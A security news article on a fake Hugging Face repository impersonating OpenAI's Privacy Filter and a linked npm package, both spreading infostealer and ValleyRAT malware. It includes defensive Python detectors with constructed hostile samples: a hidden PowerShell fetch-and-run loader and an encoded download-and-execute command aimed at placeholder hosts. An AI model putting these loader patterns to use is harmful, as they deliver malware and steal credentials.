Malicious Hugging Face Repository Impersonates OpenAI, Spreads Information Stealer
A fake **Hugging Face** repository mimicking **OpenAI**'s Privacy Filter climbed to the top of the site's trending list while delivering a Rust-based information stealer to Windows users. The malicious project copied the legitimate model's description to trick users into downloading and running it.

### Typosquatting Attack on Hugging Face
The malicious repository, named `Open-OSS/privacy-filter`, impersonated **OpenAI**'s legitimate `openai/privacy-filter` model, released last month. It copied the legitimate model card almost verbatim to deceive users into downloading the malicious code. **Hugging Face** has since disabled access to the fake model.
**OpenAI** introduced Privacy Filter in April 2026 as a means to detect and redact Personally Identifiable Information (PII) in unstructured text, aiming to enhance privacy and security in applications.
### Technical Details of the Attack
"The repository had typosquatted **OpenAI**'s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a `loader.py` file that fetches and executes infostealer malware on Windows machines," the **HiddenLayer** Research Team reported.
The malicious project's model card instructs users to clone the repository and then run either a batch script (`start.bat`) on Windows or a Python script (`loader.py`) on Linux or macOS, ostensibly to install dependencies and start the model.
Once executed, the Python script disables SSL certificate verification, decodes a Base64-encoded URL pointing to a document hosted on **JSON Keeper**, fetches that document, and extracts from it a command that is handed to **PowerShell** for execution. Hosting the command on **JSON Keeper** rather than in the repository lets the attackers swap payloads at any time without modifying the repository, so a reviewer who reads `loader.py` alone never sees the actual command.
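The loader behaviour described above is cheap to triage statically before anything is executed. The following is an added example, not code from the article or from **HiddenLayer**: it parses a loader script with Python's `ast` module and flags the three traits the article attributes to `loader.py` (SSL verification disabled, a Base64 literal that decodes to a URL, and a command line launching PowerShell). The sample loader embedded below is constructed for the example and its URL is a placeholder, not the attackers' real JSON Keeper address.

```python
"""Static triage of a repository loader script (added example).

Not the article's or HiddenLayer's code. Flags: SSL verification
disabled, Base64 literals that decode to URLs, and PowerShell launched
from Python. Nothing in the analysed script is executed.
"""
import ast
import base64
import binascii
import re

URL_RE = re.compile(r"^https?://\S+$")

# Constructed sample mirroring the pattern the article describes.
# The URL is a placeholder, not the real JSON Keeper document.
PLACEHOLDER_URL = "https://jsonkeeper.example/b/ABCD"
_B64 = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_LOADER = f'''
import ssl, base64, json, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("{_B64}").decode()
cfg = json.loads(urllib.request.urlopen(u).read())
subprocess.run(["powershell", "-w", "hidden", "-c", cfg["cmd"]])
'''

# Constructed benign control: fetches a model over TLS, nothing else.
BENIGN_LOADER = "import requests\nr = requests.get('https://huggingface.co/api/models')\n"


def call_name(node):
    """Dotted name of a call target, e.g. 'subprocess.run' or 'os.system'."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def decode_b64_literals(tree):
    """Yield (lineno, decoded_text) for string constants that are valid Base64."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value.strip()
            if len(s) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=]+", s):
                continue
            try:
                yield node.lineno, base64.b64decode(s, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue


def triage(source):
    """Return sorted (lineno, finding) pairs for a loader's source text."""
    tree = ast.parse(source)
    findings = set()
    for node in ast.walk(tree):
        # 1. SSL verification disabled, either by swapping the default
        #    HTTPS context or by passing verify=False to a request call.
        if isinstance(node, ast.Assign):
            for t in node.targets:
                if isinstance(t, ast.Attribute) and t.attr == "_create_default_https_context":
                    findings.add((node.lineno, "ssl_verification_disabled"))
        if isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    findings.add((node.lineno, "ssl_verification_disabled"))
            # 2. PowerShell launched through subprocess/os from a "loader".
            if call_name(node).split(".")[0] in ("subprocess", "os") and any(
                isinstance(c, ast.Constant) and isinstance(c.value, str)
                and "powershell" in c.value.lower()
                for c in ast.walk(node)
            ):
                findings.add((node.lineno, "powershell_exec"))
    # 3. Base64 literals that hide a URL from a casual reader.
    for lineno, text in decode_b64_literals(tree):
        if URL_RE.match(text):
            findings.add((lineno, f"b64_url:{text}"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, finding in triage(SAMPLE_LOADER):
        print(f"line {lineno}: {finding}")
```

Running the script prints one line per finding for the constructed sample and nothing for the benign control. The check is deliberately narrow: it looks for the combination the article describes rather than any single trait, since disabling SSL verification or spawning PowerShell alone is common in legitimate tooling.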
The **PowerShell** command downloads a batch script from a remote server (`api[.]eth-fastscan[.]org`) and launches it with `cmd.exe`. This batch script acts as a second-stage downloader: it elevates privileges through a User Account Control (UAC) prompt, adds **Microsoft Defender Antivirus** exclusions, downloads the next-stage binary from the same domain, and registers a scheduled task that runs a **PowerShell** script to execute that binary.
### Information Stealer Payload
Once the scheduled task fires, the **PowerShell** script waits two seconds and then deletes itself. The final stage is an information stealer that captures screenshots and harvests data from **Discord**, cryptocurrency wallets and wallet browser extensions, system metadata, files such as FileZilla configurations and wallet seed phrases, and **Chromium**- and **Gecko**-based web browsers.
"Despite using a scheduled task, this stage establishes no persistence: the task is destroyed before any reboot. It is being used as a one-shot SYSTEM-context launcher," **HiddenLayer** explained.
The stealer also checks for debuggers and sandboxes, confirms it is not running inside a virtual machine, and attempts to disable the **Windows Antimalware Scan Interface (AMSI)** and **Event Tracing for Windows (ETW)** to evade detection. The stolen data is exfiltrated as JSON to the `recargapopular[.]com` domain.

### Inflated Popularity and Additional Malicious Repositories
Before being disabled, the malicious model reached the #1 trending position on **Hugging Face**, with roughly 244,000 downloads and 667 likes within 18 hours, figures that are suspected to have been artificially inflated.
Further analysis revealed six more repositories using a similar Python loader to deploy the stealer:
* `anthfu/Bonsai-8B-gguf`
* `anthfu/Qwen3.6-35B-A3B-APEX-GGUF`
* `anthfu/DeepSeek-V4-Pro`
* `anthfu/Qwopus-GLM-18B-Merged-GGUF`
* `anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF`
* `anthfu/supergemma4-26b-uncensored-gguf-v2`
### Connection to ValleyRAT
**HiddenLayer** also found the `api[.]eth-fastscan[.]org` domain serving a different Windows executable (`o0q2l47f.exe`) that beacons to `welovechinatown[.]info`, a command-and-control (C2) server previously used in a campaign involving a malicious npm package named `trevlo` to deliver **ValleyRAT** (aka Winos 4.0).
The `trevlo` Node.js library was downloaded more than 2,300 times after being published by a user named `titaniumg` on April 4, 2026. The package's `postinstall` hook silently runs an obfuscated JavaScript loader that spawns a Base64-encoded **PowerShell** command, which fetches and executes a second-stage **PowerShell** script from attacker-controlled infrastructure, as reported by **Panther**.
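An install-time hook of this kind is visible in the package manifest, and the encoded **PowerShell** command it ultimately spawns can be decoded without running anything: `-EncodedCommand` is Base64 over UTF-16LE text. The following is an added example, not code from the article, from **Panther**'s report, or from the `trevlo` package: it lists the lifecycle scripts in a `package.json` that run on install, follows a `node <file>` hook into the referenced JavaScript, and decodes any encoded **PowerShell** it finds. The manifest, the loader and the staging URL below are constructed for the example.

```python
"""Triage of npm manifests for install-time hooks (added example).

Not the article's, Panther's, or the trevlo package's code. Lists
lifecycle scripts that run at install time and decodes PowerShell
-EncodedCommand payloads (Base64 over UTF-16LE) found in the hook or
in the JavaScript file the hook runs. Nothing is executed.
"""
import base64
import binascii
import json
import re

# Scripts npm runs during installation without further user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# powershell/pwsh ... -e|-ec|-en|-enc|-encodedcommand <base64>
# PowerShell accepts any unambiguous prefix of -EncodedCommand; "-ex"/"-ep"
# (ExecutionPolicy) do not match because of the \b after the flag.
PS_ENC_RE = re.compile(
    r"(?i)(?:powershell|pwsh)(?:\.exe)?[\s\S]{0,200}?"
    r"-(?:e|ec|en|enc|encodedcommand)\b[\s\"',]+([A-Za-z0-9+/=]{16,})"
)


def encode_command(script):
    """Build the -EncodedCommand argument for `script` (what an attacker does)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_command(b64):
    """Inverse of encode_command: Base64 -> UTF-16LE -> text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def encoded_commands(text):
    """Decode every encoded PowerShell command found in `text`."""
    out = []
    for m in PS_ENC_RE.finditer(text):
        try:
            out.append(decode_command(m.group(1)))
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like Base64 but was not an encoded command
    return out


def install_hooks(manifest):
    """Lifecycle scripts that run at install time, as {hook: command}."""
    scripts = manifest.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def triage_package(manifest_json, files):
    """Return [(hook, command, [decoded PowerShell...])] for a package.

    `files` maps relative paths to file contents so a `node loader.js`
    hook can be followed into the script it actually runs.
    """
    manifest = json.loads(manifest_json)
    findings = []
    for hook, cmd in install_hooks(manifest).items():
        decoded = encoded_commands(cmd)
        for tok in cmd.split():
            if tok.endswith(".js") and tok in files:
                decoded += encoded_commands(files[tok])
        findings.append((hook, cmd, decoded))
    return findings


# Constructed sample: the stage-2 fetch a loader might hide. Placeholder host.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('https://stage.example/s.ps1')"

SAMPLE_MANIFEST = json.dumps({
    "name": "example-pkg",          # constructed, not the real package
    "version": "1.0.0",
    "scripts": {"postinstall": "node loader.js", "test": "jest"},
})

SAMPLE_LOADER_JS = (
    'const { spawn } = require("child_process");\n'
    'spawn("powershell.exe", ["-NoProfile", "-w", "hidden", "-enc", "'
    + encode_command(PLAINTEXT)
    + '"], { detached: true, windowsHide: true }).unref();\n'
)


if __name__ == "__main__":
    for hook, cmd, decoded in triage_package(SAMPLE_MANIFEST, {"loader.js": SAMPLE_LOADER_JS}):
        print(f"{hook}: {cmd}")
        for d in decoded:
            print("  decoded PowerShell:", d)
```

The manifest alone only shows `node loader.js`, which is why the check follows the hook into the file it runs; a real review would also look at what that file does beyond spawning PowerShell. Installing with `npm install --ignore-scripts` prevents these hooks from running at all and is a reasonable default for untrusted packages.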

That script downloads and runs a **Winos 4.0** stager binary (`CodeRun102.exe`) with evasion measures built in: hidden-window execution, removal of the Zone.Identifier stream (the mark-of-the-web) from the downloaded file, and detachment from the parent process.
This attack represents a new initial access vector for **ValleyRAT**, a modular remote access trojan typically distributed via phishing emails and search engine optimization (SEO) poisoning. **ValleyRAT** is associated with the China-linked threat actor **Silver Fox**.
"The shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems," **HiddenLayer** concluded.